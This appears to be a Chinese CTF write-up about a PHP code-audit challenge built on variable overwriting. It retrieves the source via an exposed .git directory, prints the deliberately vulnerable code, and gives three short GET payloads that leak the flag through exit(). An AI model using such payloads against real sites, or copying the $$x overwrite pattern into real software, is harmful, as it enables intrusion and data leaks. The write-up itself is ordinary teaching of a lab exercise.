0x00 前言
比较基本的代码审计,考查变量覆盖
目录滚一下
Githack -> down一下
不知道为什么现在flag.php和index.php都down不下来了 --?可能靶场环境问题把
直接拿师傅wp里的源码了
关于对源码的个人理解我已标明在注释中
<?php
include 'flag.php';
$yds = "dog";
$is = "cat";
$handsome = 'yds';
foreach($_POST as $x => $y){
$$x = $y; //POST型声明至当前文件
}
foreach($_GET as $x => $y){
$$x = $$y; //GET型变量重新赋值为当前文件变量中以其值为键名的值
}
foreach($_GET as $x => $y){
if($_GET['flag'] === $x && $x !== 'flag'){ //如果GET型中flag变量的值等于GET型中一个不为flag的键名则退出
exit($handsome); //exit显然能利用
}
}
//如果GET型和POST型中都没有变量flag,则退出
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
exit($yds);
}
if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
exit($is);
}
echo "the flag is: ".$flag;
一开始没有想到能利用exit里的变量,丢脸了…
就想着过三层判断输出flag,没想到被自己覆盖了…
水平有限,至今没想出怎么绕过三个if且不覆盖的情况下在最后一层输出flag
0x01 三解
利用handsome
/?handsome=flag
通过如下
$handsome=$flag
从而成功获取flag
为满足条件退出追加两个参数 x=flag&flag=x
foreach($_GET as $x => $y){
$$x = $$y; //GET型变量重新赋值为当前文件变量中以其值为键名的值
}
foreach($_GET as $x => $y){
if($_GET['flag'] === $x && $x !== 'flag'){ //如果GET型中flag变量的值等于GET型中一个不为flag的键名则退出
exit($handsome); //exit显然能利用
}
}
所以poc
/?handsome=flag&flag=x&x=flag
利用yds
比较简单 直接 /?yds=flag即可
foreach($_GET as $x => $y){
$$x = $$y; //GET型变量重新赋值为当前文件变量中以其值为键名的值
}
//如果GET型和POST型中都没有变量flag,则退出
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
exit($yds);
}
利用is
/?is=flag&flag=flag
if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
exit($is);
}
参考文章
https://blog.csdn.net/qq_43622442/article/details/105925473
0x02 rethink
这篇有点水…
一步步来吧